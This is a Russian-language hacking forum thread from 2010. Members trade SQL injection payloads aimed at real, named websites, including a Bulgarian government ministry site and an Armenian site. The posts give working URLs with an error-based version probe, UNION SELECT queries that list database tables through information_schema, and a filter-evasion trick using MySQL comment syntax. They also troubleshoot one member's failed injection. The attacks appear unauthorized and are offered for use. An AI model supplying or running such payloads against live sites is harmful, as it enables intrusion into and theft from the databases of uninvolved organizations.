
17.02.2010, 23:37
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме: 686641
Репутация:
205
|
|
Т.е. нифига не получится?
|
|
|

17.02.2010, 23:40
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Т.е екстрасенсы в отпуске
Я написал то, что вижу, исходя из того, что ты дал
Или иди статью читай, или линк давай
|
|
|

17.02.2010, 23:44
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме: 686641
Репутация:
205
|
|
Код HTML:
http://www.mlsp.government.bg/showimage.asp?id=1'+or+1=@@version--
Скромно, да? =))
P.S. Я статьи все уже давно наизусть знаю, просто давно не было MSSQL-INJ поэтому решил спросить.
Последний раз редактировалось ~EviL~; 17.02.2010 в 23:46..
|
|
|

18.02.2010, 01:56
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме: 1957988
Репутация:
739
|
|
это Microsoft Access а не MS SQL. Доступа к msysobjects как всегда нету. И в id=1' кавычка не нужна.
|
|
|

18.02.2010, 02:20
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме: 568388
Репутация:
87
|
|
l1ght да DB Server: MSSQL
ну вот так
-1'+union+select+1,2,3,4,5,table_name,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+from+information_sche ma.tables+--+
через where+table_name+... (not in '....') както не идет
Последний раз редактировалось [Feldmarschall]; 18.02.2010 в 04:50..
|
|
|

18.02.2010, 11:05
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
LokbatanLi
Например так
http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1
|
|
|

18.02.2010, 20:36
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме: 1535319
Репутация:
-16
|
|
Сообщение от jokester
LokbatanLi
Например так
http://www.aspik.am/index.php?p=-5+union+/*!select*/+/*!table_name*/+from+information_schema.tables+limit+19,1
извини Jokester
а ето какоы метод или есть статя об етому ??
|
|
|

18.02.2010, 22:35
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Сообщение от LokbatanLi
извини Jokester
а ето какоы метод или есть статя об етому ??
http://devteev.blogspot.com/search/label/waf
|
|
|

18.02.2010, 16:58
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме: 866555
Репутация:
226
|
|
А есть какая-нибудь функция типа NAME_CONST??? В скрипте два запроса. Версия 5. NAME_CONST не работает
|
|
|

18.02.2010, 20:53
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме: 3300342
Репутация:
165
|
|
При попытки произвести SQl inj выводится ошибка,
но "order by 12" съела, а union+select выдаёт ошибку
Куда копать, если выдаёт такую ошибку ?
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1,2,3,4,5,6,7,8,9,10,11,12-- order by foto_foto.d_dobavl desc limit 1' at line 1
Последний раз редактировалось SeNaP; 18.02.2010 в 20:56..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|